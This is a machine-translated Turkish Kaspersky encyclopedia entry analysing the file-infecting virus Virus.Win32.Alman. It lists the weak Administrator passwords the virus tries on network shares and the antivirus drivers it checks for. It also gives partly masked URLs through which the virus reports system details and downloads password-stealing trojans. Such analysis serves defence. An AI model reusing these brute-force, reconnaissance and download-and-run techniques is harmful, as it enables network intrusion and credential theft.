BU SERVİS, GOOGLE TARAFINDAN SAĞLANAN ÇEVİRİLER İÇEREBİLİR. GOOGLE, HERHANGİ BİR GARANTİ, GÜVENİLİRLİK VE TİCARİ ELVERİŞLİLİK, BELİRLİ BİR AMACA UYGUNLUK VE İHLAL ETMEME GARANTİLERİ DAHİL OLMAK ÜZERE AÇIK VEYA ZIMNİ GARANTİLER DE DAHİL OLMAK ÜZERE, AÇIK VEYA ZIMNİ TÜM GARANTİLERİ REDDEDER.

Kaspersky Lab web sitesi, Google Çeviri tarafından desteklenen çeviri yazılımı kullanılarak size kolaylık sağlamak amacıyla tercüme edilmiştir. Doğru bir çeviri sağlamak için makul çabalar sarf edilmiştir, ancak otomatik çeviri mükemmel değildir ve insan çevirmenlerinin yerini alması amaçlanmamıştır. Çeviriler, Kaspersky Lab web sitesinin kullanıcılarına bir hizmet olarak sunulur ve "olduğu gibi" sağlanır. İngilizce'den başka bir dile çevrilmiş herhangi bir çevirinin doğruluğu, güvenilirliği veya doğruluğu konusunda açık ya da zımni hiçbir garanti verilmemektedir. Çeviri yazılımı sınırlamaları nedeniyle bazı içerikler (görüntüler, videolar, Flash vb. Gibi) doğru bir şekilde çevrilemeyebilir.

Virus.Win32.Alman

Bulunma tarihi 06/19/2007
Sınıf Virus
Platform Win32
Açıklama

Virüs, kurbanın bilgisayarındaki ve erişilebilir ağ klasörlerindeki tüm disklerdeki tüm erişilebilir Windows yürütülebilir dosyalarını (PE-EXE) bozar. Virüs dosyaları aşağıdaki isimlere bulaşmaz:

 wooolcfg.exe



woool.exe



ztconfig.exe



patchupdate.exe



trojankiller.exe



xy2player.exe



flyff.exe



xy2.exe



au_unins_web.exe



cabal.exe



cabalmain9x.exe



cabalmain.exe



meteor.exe



Patcher.exe



mjonline.exe



config.exe



zuonline.exe



userpic.exe



main.exe



dk2.exe



autoupdate.exe



dbfsupdate.exe



asktao.exe



sealspeed.exe



xlqy2.exe



game.exe



wb-service.exe



nbt-dragonraja2006.exe



dragonraja.exe



mhclient-connect.exe



hs.exe



mts.exe



Gc.exe.exe



zfs.exe



neuz.exe



maplestory.exe



nsstarter.exe



nmcosrv.exe



ca.exe



nmservice.exe



kartrider.exe



audition.exe



zhengtu.exe 

Virüs, çalıştırılabilir dosyasını, virüs bulaşan dosyanın başlangıcına yazar ve dosyanın orijinal içeriğini aşağı doğru kaydırır.

Ağ klasörlerinde bulunan dosyalara bulaşmak için virüs, Administrator hesabını ve aşağıdaki şifrelerden birini kullanarak uzak makinelere bağlanmayı dener:

 zxcv



qazwsx



qaz



qwer



! @ # $% ^ & * ()



! @ # $% ^ & * (



! @ # $% ^ & *



! @ # $% ^ &



! @ # $% ^



! @ # $%



aasdf 



sdfgh



! @ # $



654321



123456



12345



1234



123



111 

Virüs ayrıca, C diskindeki boş alan miktarı, kurbanın makinesindeki işletim sistemi ve Internet Explorer sürümleri ve listelenen isimlerden birine sahip olan sistemdeki sürücülerin varlığı hakkında uzaktaki kötü niyetli kullanıcının sitesine bilgi gönderir. altında:

 Hooksys



KWatch3



KregEx



KLPF



NaiAvFilter1



Navap



AVGNTMGR



AvgTdi



nod32drv



PavProtect



TMFilter



BDFsDrv



VETFDDNT 

Bu bilgi, uzaktaki kötü niyetli kullanıcının sitesine şu istekte gönderilir:

 http: //****mrw0rldwide.com/co.asp? action = post & HD = <boş alan miktarı> & OT = <işletim sistemi sürümü> & IV = <Internet Explorer sürümü> & AV = <yüklü sürücüler> 

Virüs ayrıca aşağıdaki linkten indirilecek dosyaların bir listesini alır:

http: //****mrw0rldwide.com/z.dat

Daha sonra dosyaları listeden indirir, bunları Windows geçici dizinine kaydeder ve bunları çalıştırılmak üzere başlatır.

Yazım sırasında, virüs aşağıdaki linklerden dosyaları indirdi:

 http: //down****net/css.jpg



http: //down****net/wow.jpg 

ve aşağıda gösterildiği gibi kaydedildi:

% Temp% css.jpg – bu dosya boyut olarak 62 792 bayttır. Kaspersky Anti-Virus tarafından Trojan-PSW.Win32.OnLineGames.afd;

% Temp% wow.jpg – bu dosya boyutu 24 241 bayttır. Kaspersky Anti-Virus tarafından Trojan-PSW.Win32.WOW.sv olarak algılanacaktır.


Orijinaline link